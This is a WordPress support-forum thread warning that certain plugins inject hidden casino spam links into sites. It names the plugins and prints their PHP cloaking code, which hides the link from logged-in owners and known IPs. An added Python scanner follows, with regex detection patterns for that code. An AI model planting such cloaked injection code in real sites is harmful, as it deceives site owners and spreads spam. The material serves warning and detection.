maggot399
Forum Replies Created
Forum: Fixing WordPress
In reply to: Website Hacked… writing appearing above website.
You weren’t hacked, it was from a plugin you installed. See this post for more information;
https://www.ads-software.com/support/topic/my-site-deface-link-integrated-on-my-homepage
Forum: Fixing WordPress
In reply to: My Site deface link integrated on my homepage
Actually all the others on the list have already been dealt with so I see WordPress do have a lot of moderators here that seem to do a great job in protecting other WordPress users.
The issue is, however, there’s no doubt other plugins live right now, created by the same spammer, that we don’t know about. When they create a new plugin it ‘survives’ for a few weeks without being detected, which is enough for a good few hundred sites to get infected. Once you install one of the dodgy plugins created by this spammer it is hard to even notice you have a problem, because of the way it deceptively hides the link to the site owner.
Also many thousands of sites remain infected right now by the plugins I listed above, even though they were removed quite quickly.
Is there any way for WordPress to email users that have installed a plugin after it gets removed for reasons like this? I take it once WordPress is installed on their own domain there’s no connection between WordPress servers and the site owner?
See these links for more information
https://www.ads-software.com/support/topic/strange-link-to-casino-online-appeared-at-the-top-of-my-blog
https://www.ads-software.com/support/topic/random-casino-link-has-appeared-on-my-wordpress-site
To see just how widespread the problem is just type in one of the spammy domains into Google and see just how many thousands are displaying the link on their blog. (couple of the links are in the links I provided above).
Thanks
Forum: Fixing WordPress
In reply to: My Site deface link integrated on my homepage
Actually no one hacked into your site the way you might think – the spam links are created by a malicious WordPress plugin you downloaded directly from www.ads-software.com. The spammer just keeps creating new plugins after they get banned. Definitely a flaw in the way WordPress offer plugins to users…
The following plugins are known to be linked to the spammer;
seo-cheese
return-to-top
g-translate (note the hyphen – other versions are fine)
seo-interlinking
google-maps-by-daniel-martyn
If you have installed any of these plugins they should be removed immediately as they are all produced by the same hacker. They all insert dodgy links into the top of your site.
Malicious code (this is normally found in setup.php or install.php)
<?php
// Decide whether the current visitor is logged in to WordPress.
if (is_user_logged_in()) {
    $loggedin = 'yes';
} else {
    $loggedin = 'no';
}
if ($loggedin == 'no') {
    $ip = $_SERVER['REMOTE_ADDR'];
    // created.txt holds the IP addresses the link is hidden from.
    $filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/seo-cheese/created.txt';
    $handle = fopen($filename, "r");
    $contents = fread($handle, filesize($filename));
    fclose($handle);
    $filestring = $contents;
    $findme = $ip;
    $pos = strpos($filestring, $findme);
    if ($pos === false) {
?>
<p align="center"><a href="https://online-casino.blog.ca">https://online-casino.blog.ca</a></p>
<?php
        //
    } else {
        echo '';
    }
}
?>
The following sites are linked to the same hacker and listing them here will hopefully help other people who have the same issue.
[ Thanks but please do not post spammy links like that on these forums ]
The trick works well because the link itself is not visible to the site owner as firstly, it doesn’t show if you are logged in to your own site, and secondly it also keeps a log of all past IP addresses that successfully logged in before and hides the link from any recorded IP addresses.
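
A way to check an install for the plugins and the cloaking pattern described in the post above, as an added example that is not part of the original post or of WordPress itself. The three-marker heuristic, the function names and the sample tree (including the `spam.example` link) are assumptions constructed for this example.

```python
import re
import tempfile
from pathlib import Path

# Plugin slugs named in the post above.
KNOWN_BAD_SLUGS = {"seo-cheese", "return-to-top", "g-translate",
                   "seo-interlinking", "google-maps-by-daniel-martyn"}

# Heuristic (an assumption of this example): a plugin file that checks login
# state, reads the visitor IP and emits a hard-coded external link matches
# the cloaking behaviour described in the post.
CLOAK_MARKERS = [
    re.compile(r"is_user_logged_in\s*\("),
    re.compile(r"\$_SERVER\s*\[\s*['\"]REMOTE_ADDR['\"]\s*\]"),
    re.compile(r"<a\s+href\s*=\s*['\"]https?://", re.I),
]

def scan_plugins(plugins_dir):
    """Return sorted (slug, reason) findings for a wp-content/plugins directory."""
    findings = set()
    for plugin in Path(plugins_dir).iterdir():
        if not plugin.is_dir():
            continue
        if plugin.name in KNOWN_BAD_SLUGS:
            findings.add((plugin.name, "known-bad slug"))
        for php in plugin.rglob("*.php"):
            text = php.read_text(errors="replace")
            if all(m.search(text) for m in CLOAK_MARKERS):
                findings.add((plugin.name, f"cloaked link in {php.name}"))
    return sorted(findings)

def build_sample(root):
    """Constructed sample tree: one listed slug, one renamed copy, one clean plugin."""
    cloaked = ("<?php if (!is_user_logged_in()) { $ip = $_SERVER['REMOTE_ADDR']; ?>"
               '<p><a href="https://spam.example/">x</a></p><?php } ?>')
    clean = "<?php if (is_user_logged_in()) { echo 'hello'; } ?>"
    for slug, name, body in [("seo-cheese", "setup.php", cloaked),
                             ("new-unknown-plugin", "install.php", cloaked),
                             ("contact-form", "main.php", clean)]:
        (Path(root) / slug).mkdir(parents=True)
        (Path(root) / slug / name).write_text(body)
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for slug, reason in scan_plugins(build_sample(tmp)):
            print(f"{slug}: {reason}")
```

The content check matters because the slug list only catches plugins already reported; a renamed copy with the same code is flagged by the markers alone.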